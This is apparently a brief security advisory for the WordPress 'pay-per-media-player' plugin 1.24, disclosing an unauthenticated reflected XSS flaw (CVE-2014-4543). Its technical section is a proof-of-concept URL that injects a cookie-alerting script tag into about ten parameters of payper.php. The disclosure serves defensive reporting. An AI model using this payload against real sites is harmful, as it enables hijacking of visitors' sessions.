Wp Plugin Pay per Media Player

Plugin Details

Plugin Name: wp-plugin : pay-per-media-player
Effected Version : 1.24 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Minimum Level of Access Required : Unauthenticated
CVE Number : CVE-2014-4543
Identified by : Prajalkulkarni
WPScan Reference URL

Disclosure Timeline

Technical Details

http://127.0.0.1/wordpress/wp-content/wp-plugs/paypermediaplayer/payper/payper.php?fcolor=fcolor%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&links=links%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&stitle=stitle%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&height=height%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&width=width%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&host=host%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&bcolor=bcolor%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&msg=msg%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&id=id%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&size=size%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&